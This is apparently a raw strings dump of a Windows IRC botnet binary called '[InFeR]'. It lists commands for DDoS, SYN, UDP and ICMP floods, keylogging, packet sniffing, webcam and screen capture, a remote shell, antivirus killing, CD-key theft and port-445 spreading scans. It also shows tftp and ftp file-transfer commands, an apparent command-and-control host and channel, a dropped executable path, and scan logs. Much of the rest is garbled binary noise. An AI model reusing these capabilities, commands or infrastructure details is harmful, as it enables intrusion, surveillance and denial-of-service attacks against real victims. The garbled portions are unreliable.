<%d>. [TFTP]: Failed to start server thread, error: <%d>. [TFTP]: Already running. [FINDPASS]: Failed to start search thread, error: <%d>. [FINDPASS]: Searching for password. [MAIN]: Nick changed to: '%s'. [MAIN]: Joined channel: '%s'. [MAIN]: Parted channel: '%s'. [MAIN]: IRC Raw: %s. [THREADS]: Failed to kill thread: %s. [THREADS]: Killed thread: %s. [THREADS]: No active threads found. [THREADS]: Stopped: %d thread(s). all QUIT :later [MAIN]: Prefix changed to: '%c'. [SHELL]: Couldn't open file: %s [SHELL]: File opened: %s [MAIN]: Server changed to: '%s'. [DNS]: Couldn't resolve hostname. [DNS]: Lookup: %s -> %s. [PROC]: Failed to terminate process: %s [PROC]: Process killed: %s [PROC]: Failed to terminate process ID: %s [PROC]: Process killed ID: %s [FILE]: Deleted '%s'. [DCC]: Send File: %s, User: %s. [FILE]: List: %s [VISIT]: Failed to start connection thread, error: <%d>. [VISIT]: URL: %s. [mIRC]: Command sent. [mIRC]: Client not open. [CMD]: Commands: %s [CMD]: Error sending to remote shell. [MAIN]: Read file failed: %s [MAIN]: Read file complete: %s [CAPTURE]: Invalid parameters for amateur video capture. [CAPTURE]: Error while capturing amateur video from webcam. [CAPTURE]: Amateur video saved to: %s. video [CAPTURE]: Invalid parameters for webcam capture. [CAPTURE]: Error while capturing from webcam. [CAPTURE]: Webcam capture saved to: %s. frame [CAPTURE]: Driver list complete. [CAPTURE]: Driver #%d - %s - %s. drivers [CAPTURE]: No filename specified for screen capture. [CAPTURE]: Error while capturing screen. [CAPTURE]: Screen capture saved to: %s. screen [MAIN]: Gethost: %s. [MAIN]: Unable to extract Gethost command. [MAIN]: Gethost: %s, Command: %s [MAIN]: Alias added: %s. [MAIN]: Privmsg: %s: %s. [MAIN]: Action: %s: %s. [MAIN]: Cycle. PART %s [MAIN]: Mode change: %s MODE %s [CLONE]: Raw (%s): %s [CLONE]: Mode (%s): %s MODE %s [CLONE]: Nick (%s): %s NICK %s JOIN %s %s PART %s [MAIN]: Repeat not allowed in command line: %s [MAIN]: Repeat: %s [MAIN]: Delay. %s %s %s :%s [UPDATE]: Bot ID must be different than current running process. [UPDATE]: Failed to start download thread, error: <%d>. [UPDATE]: Downloading update from: %s. %s%s.exe [EXEC]: Commands: %s [EXEC]: Couldn't execute file. [FINDFILE]: Failed to start search thread, error: <%d>. [FINDFILE]: Searching for file: %s in: %s. [FILE]: [FILE]: Rename: '%s' to: '%s'. [ICMP]: Invalid flood time must be greater than 0. [ICMP]: Failed to start flood thread, error: <%d>. [ICMP]: Flooding: (%s) for %s seconds. [CLONES]: Failed to start clone thread, error: <%d>. [CLONES]: Created on %s:%d, in channel %s. [DDoS]: Failed to start flood thread, error: <%d>. [DDoS]: Flooding: (%s:%s) for %s seconds. [SYN]: Failed to start flood thread, error: <%d>. [SYN]: Flooding: (%s:%s) for %s seconds. [DOWNLOAD]: Failed to start transfer thread, error: <%d>. [DOWNLOAD]: Downloading URL: %s to: %s. [SCAN]: Port scan started: %s:%d with delay: %d(ms). [%s] <%s> %s [%s] * %s %s ACTION %s [SCAN]: Failed to start scan thread, error: <%d>. [SCAN]: %s Port Scan started on %s:%d with a delay of %d seconds for %d minutes using %d threads. Sequential [SCAN]: Failed to start scan, no IP specified. [SCAN]: Failed to start scan, port is invalid. [SCAN]: Already %d scanning threads. Too many specified. [UDP]: Failed to start flood thread, error: <%d>. [UDP]: Sending %d packets to: %s. Packet size: %d, Delay: %d(ms). ICMP.dll not available [PING]: Failed to start flood thread, error: <%d>. [PING]: Sending %d pings to %s. packet size: %d, timeout: %d(ms). [TCP]: Invalid flood time must be greater than 0. [TCP]: Failed to start flood thread, error: <%d>. [TCP]: %s %s flooding: (%s:%s) for %s seconds. Normal Spoofed [TCP]: Invalid flood type specified. random ack [FTP]: Uploading file: %s to: %s failed. [FTP]: Uploading file: %s to: %s ftp.exe open %s put %s bye %s\%i%i%i.dll [FTP]: File not found: %s. upload [EMAIL]: Message sent to %s. helo $rndnick mail from: <%s> rcpt to: <%s> data subject: %s from: %s email tcp tcpflood ping pingflood udp udpflood adv advscan c_action c_pm c_privmsg scan download syn synflood clone icmp icmpflood rename findfile execute update delay repeat c_part c_join c_nick c_mode c_raw mode cycle action privmsg addalias gethost cap capture [NET]: Command unknown. [NET]: No message specified. [NET]: User list failed. [NET]: User list completed. [NET]: Share list failed. [NET]: Share list completed. share continue pause stop [NET]: Service list failed. [NET]: Service list completed. start [NET]: Failed to load advapi32.dll or netapi32.dll. net [KEYLOG]: Failed to start logging thread, error: <%d>. [KEYLOG]: Key logger active. [KEYLOG]: Already running. [KEYLOG]: No key logger thread found. [KEYLOG]: Key logger stopped. (%d thread(s) stopped.) file keylog [PSNIFF]: No Carnivore thread found. [PSNIFF]: Carnivore stopped. (%d thread(s) stopped.) off [PSNIFF]: Failed to start sniffer thread, error: <%d>. [PSNIFF]: Carnivore packet sniffer active. [PSNIFF]: Already running. psniff readfile cmd mirc mirccmd visit list get del delete kill killproc dns prefix c_rn c_rndnick c_quit killthread raw part join nick scanall findpass [MAIN]: Crashing bot. crash tftp tftpserver http httpserver rlogin rloginserver cip currentip fdns flushdns farp flusharp getclip [MAIN]: Login list complete. -[Login List]- who [CMD] Remote shell cmdstop ocmd opencmd dll testdlls drv driveinfo uptime getcdkeys procs remove sysinfo netinfo clg clearlog log aliases threads [MAIN]: Failed to reboot system. [MAIN]: Rebooting system. reboot status quit disconnect reconnect stats scanstats [SCAN] Scan scanstop [SECURE] Secure securestop [CLONES] Clone clonestop psstop procsstop ffstop findfilestop [TFTP] tftpstop [PING] Ping flood pingstop [UPD] UDP flood udpstop [SYN] Syn flood synstop [DDoS] DDoS flood ddos.stop [REDIRECT] TCP redirect redirectstop [LOG] Log list logstop [HTTPD] httpstop [RLOGIND] Server rloginstop unsec unsecure sec secure ver version logout die rndnick $chr( $server $rndnick $chan $user [DCC]: Chat failed by unauthorized user: %s. [DCC]: Chat already active with user: %s. [DCC]: Failed to start chat thread, error: <%d>. [DCC]: Chat from user: %s. CHAT [DCC]: Receive file: '%s' failed from unauthorized user: %s. [DCC]: Failed to start transfer thread, error: <%d>. NOTICE %s : PING %s PING NOTICE %s : VERSION %s VERSION [DCC]: Receive file: '%s' from user: %s. SEND DCC [MAIN]: User: %s logged out. [MAIN]: Joined channel: %s. PART NICK NOTICE %s :%s [MAIN]: User %s logged out. KICK NICK %s JOIN %s %s PONG %s pong PING PRIVMSG %s :%s [CMD]: Could not read data from proccess. [CMD]: Proccess has terminated. [CMD]: Could not read data from proccess [CMD]: Failed to start IO thread, error: <%d>. [CMD]: Remote Command Prompt cmd.exe [RLOGIND]: User logged out: <%s@%s>. [RLOGIND]: Error: SessionRun(): <%d>. [RLOGIND]: User logged in: <%s@%s>. Permission denied [RLOGIND]: Error: getpeername(): <%d>. [RLOGIND]: Protocol string too long. [RLOGIND]: Login rejected, Remote user: <%s@%s>. [RLOGIND]: Error: server failed, returned: <%d>. [RLOGIND]: Failed to start client thread, error: <%d>. [RLOGIND]: Client connection from IP: %s:%d, Server thread: %d. [RLOGIND]: Ready and waiting for incoming connections. [RLOGIND]: Failed to install control-C handler, error: <%d>. [RLOGIND]: Error: WSAStartup(): <%d>. const letter comp country [SCAN]: IP: %s Port: %d is open. [SCAN]: Scanning IP: %s, Port: %d. ADMIN$ IPC$ [SECURE]: Netapi32.dll couldn't be loaded. [SECURE]: Network shares deleted. [SECURE]: Failed to delete '%S' share. [SECURE]: Share '%S' deleted. [SECURE]: Failed to delete '%s' share. [SECURE]: Share '%s' deleted. [SECURE]: Advapi32.dll couldn't be loaded. [SECURE]: Failed to open IPC$ Restriction registry key. [SECURE]: Restricted access to the IPC$ Share. [SECURE]: Failed to restrict access to the IPC$ Share. restrictanonymous [SECURE]: Failed to open DCOM registry key. [SECURE]: DCOM disabled. [SECURE]: Disable DCOM failed. EnableDCOM [SECURE]: Network shares added. [SECURE]: Failed to add '%s' share. [SECURE]: Share '%s' added. [SECURE]: Failed to open IPC$ restriction registry key. [SECURE]: Unrestricted access to the IPC$ Share. [SECURE]: Failed to unrestrict access to the IPC$ Share. [SECURE]: DCOM enabled. [SECURE]: Enable DCOM failed. [RLOGIND]: WaitForMultipleObjects error: <%d>. [RLOGIND]: Failed to create ReadShell session thread, error: <%d>. [RLOGIND]: Failed to execute shell. [RLOGIND]: Failed to create shell stdin pipe, error: <%d>. [RLOGIND]: Failed to create shell stdout pipe, error: <%d>. [RLOGIND]: Failed to execute shell, error: <%d>. cmd /q [RLOGIND]: SessionReadShellThread exited, error: <%ld>. essAu tThru tftp.exe -i get WRQQj(j QQUS [SYN]: Done with flood (%iKB/sec). [SYN]: Send error: <%d>. %dd %dh %dm [SYSINFO]: [CPU]: %I64uMHz. [RAM]: %sKB total, %sKB free. [Disk]: %s total, %s free. [OS]: Windows %s (%d.%d, Build %d). [Sysdir]: %s. [Hostname]: %s (%s). [Current User]: %s. [Date]: %s. [Time]: %s. [Uptime]: %s. dd:MMM:yyyy couldn't resolve host [NETINFO]: [Type]: %s (%s). [IP Address]: %s. [Hostname]: %s. LAN Dial-up Not connected [TCP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB). [TCP]: Error sending packets to IP: %s. Packets sent: %d. Returned: <%d>. [TCP]: Invalid target IP. [TCP]: Error: setsockopt() failed, returned: <%d>. [TCP]: Error: socket() failed, returned: <%d>. kthx [TFTP]: File transfer complete to IP: %s (%s). [TFTP]: File not found: %s (%s). File Not Found [TFTP]: File transfer started to IP: %s (%s). [TFTP]: Failed to open file: %s. [TFTP]: Error: socket() failed, returned: <%d>. octet -[Thread List]- %s: No %s thread found. %s: %s stopped. (%d thread(s) stopped.) [VISIT]: Failed to connect to HTTP server. [VISIT]: Could not open a connection. [VISIT]: Invalid URL. [VISIT]: Failed to get requested URL from HTTP server. [VISIT]: URL visited. PST PDT HMXB S;uD z?aUY zc%C1 NKeb [08-13-2005 18:49:57] [SECURE]: Network shares deleted. share. hare. [08-13-2005 18:49:57] [SECURE]: Failed to delete 'IPC$' share. [08-13-2005 18:49:57] [SECURE]: Restricted access to the IPC$ Share. [08-13-2005 18:49:57] [SECURE]: DCOM disabled. [08-13-2005 18:47:57] [SECURE]: Network shares deleted. [08-13-2005 18:47:57] [SECURE]: Failed to delete 'IPC$' share. [08-13-2005 18:47:57] [SECURE]: Restricted access to the IPC$ Share. [08-13-2005 18:47:57] [SECURE]: DCOM disabled. [08-13-2005 18:45:57] [SECURE]: Network shares deleted. [08-13-2005 18:45:57] [SECURE]: Failed to delete 'D$' share. [08-13-2005 18:45:57] [SECURE]: Failed to delete 'C$' share. [08-13-2005 18:45:57] [SECURE]: Failed to delete 'ADMIN$' share. [08-13-2005 18:45:57] [SECURE]: Failed to delete 'IPC$' share. [08-13-2005 18:45:57] [SECURE]: Restricted access to the IPC$ Share. [08-13-2005 18:45:57] [SECURE]: DCOM disabled. [08-13-2005 18:45:57] [SECURE]: Registry monitor active. [08-13-2005 18:45:57] [SECURE]: System secure monitor active. [08-13-2005 18:45:57] [PROCS]: AV/FW Killer active. [08-13-2005 18:45:57] [MAIN]: Bot started. qcC wDZ wna vLg [MAIN]: Bot started. [InFeR]-994178 [PROCS]: AV/FW Killer active. [SECURE]: System secure monitor active. [SECURE]: Registry monitor active. [AUTO_SCAN] Random Port Scan started on 127.0.x.x:445 with a delay of 10 seconds for 99 minutes using 20 threads. [SCAN]: 127.0.x.x:445, Scan thread: 4, Sub-thread: 1. [SCAN]: IP: 127.0.174.41:445, Scan thread: 4, Sub-thread: 2. [SCAN]: IP: 127.0.24.116:445, Scan thread: 4, Sub-thread: 3. [SCAN]: IP: 127.0.23.151:445, Scan thread: 4, Sub-thread: 4. [SCAN]: IP: 127.0.80.73:445, Scan thread: 4, Sub-thread: 5. [SCAN]: IP: 127.0.212.4:445, Scan thread: 4, Sub-thread: 6. [SCAN]: IP: 127.0.217.178:445, Scan thread: 4, Sub-thread: 7. [SCAN]: IP: 127.0.228.57:445, Scan thread: 4, Sub-thread: 8. [SCAN]: IP: 127.0.49.26:445, Scan thread: 4, Sub-thread: 9. [SCAN]: IP: 127.0.87.91:445, Scan thread: 4, Sub-thread: 10. [SCAN]: IP: 127.0.147.85:445, Scan thread: 4, Sub-thread: 11. [SCAN]: IP: 127.0.14.131:445, Scan thread: 4, Sub-thread: 12. [SCAN]: 127.0.x.x:445, Scan thread: 4, Sub-thread: 13. [SCAN]: IP: 127.0.142.152:445, Scan thread: 4, Sub-thread: 14. [SCAN]: IP: 127.0.205.251:445, Scan thread: 4, Sub-thread: 15. [SCAN]: IP: 127.0.149.186:445, Scan thread: 4, Sub-thread: 16. [SCAN]: IP: 127.0.59.231:445, Scan thread: 4, Sub-thread: 17. [SCAN]: IP: 127.0.160.189:445, Scan thread: 4, Sub-thread: 18. [SCAN]: IP: 127.0.209.156:445, Scan thread: 4, Sub-thread: 19. [SCAN]: IP: 127.0.74.203:445, Scan thread: 4, Sub-thread: 20. infer.battoun2ouja3.net #inferq haha C:\WINDOWS\System32\tellecom.exe abcdefghijklmnopqrstuvwxyz ABCDEFGHIJKLMNOPQRSTUVWXYZ GlobalUnlock SetEnvironmentVariableA CompareStringW CompareStringA SetEndOfFile FlushFileBuffers SetStdHandle GetStringTypeW GetStringTypeA RtlUnwind GetFileType GetStdHandle SetHandleCount GetEnvironmentStringsW GetEnvironmentStrings FreeEnvironmentStringsW FreeEnvironmentStringsA UnhandledExceptionFilter GetOEMCP GetACP GetCPInfo MultiByteToWideChar Sleep ReadFile CloseHandle WriteFile TransactNamedPipe CreateFileA GetLastError CreateThread GetModuleFileNameA ExitThread LeaveCriticalSection EnterCriticalSection GetTickCount InitializeCriticalSectionAndSpinCount DeleteCriticalSection GetLocalTime SetFilePointer GetFileSize GetSystemDirectoryA QueryPerformanceCounter QueryPerformanceFrequency ExitProcess CreateProcessA FindClose FindNextFileA FindFirstFileA FreeLibrary GetEnvironmentVariableW GetProcAddress LoadLibraryA HeapFree HeapAlloc GetProcessHeap FileTimeToSystemTime FileTimeToLocalFileTime VirtualQueryEx ReadProcessMemory GetSystemInfo OpenProcess GetTimeFormatA GetDateFormatA GetFileAttributesA GetModuleHandleA FormatMessageA GlobalLock UnmapViewOfFile MapViewOfFile CreateFileMappingA SetFileTime GetFileTime ExpandEnvironmentStringsA SetFileAttributesA GetTempPathA WideCharToMultiByte GetComputerNameA GetCurrentProcess TerminateProcess lstrcmpiA DeleteFileA GetCurrentProcessId CopyFileA WaitForSingleObject CreateMutexA TerminateThread MoveFileA GetExitCodeProcess PeekNamedPipe DuplicateHandle CreatePipe SetConsoleCtrlHandler GetLocaleInfoA GetVersionExA GetLogicalDrives WaitForMultipleObjects GenerateConsoleCtrlEvent GlobalMemoryStatus HeapReAlloc GetTimeZoneInformation GetSystemTime GetStartupInfoA GetCommandLineA GetVersion HeapDestroy HeapCreate VirtualFree VirtualAlloc LCMapStringA LCMapStringW .text `.rdata @.data mno w?CG Vay{ 'ffO[ 6}/6Syn CTFa. u lU fCu avP TG. Vh:f= ai95O HBu, KJQy Tim rsU ?NFEB B"pI @oOG spmV p BgD x@y0zvJ xx@o HMXB S;uD z?aUY NKeb Vari oqdOfv s?Vd Rt"do dEx a(i>4te OEMCP idZ HdPi 3EY[ u5 Sp^M aHiZ Nex Mxl Fot SfA Rky4 kApJewIM 0Ap@KSUT cliA h'Tk ekK 9HCI EyL Cr1eEf n@lY Ww4M IPE z`.rm, GIu GPG KERNEL32.DLL WS2_32.dll LoadLibraryA GetProcAddress ExitProcess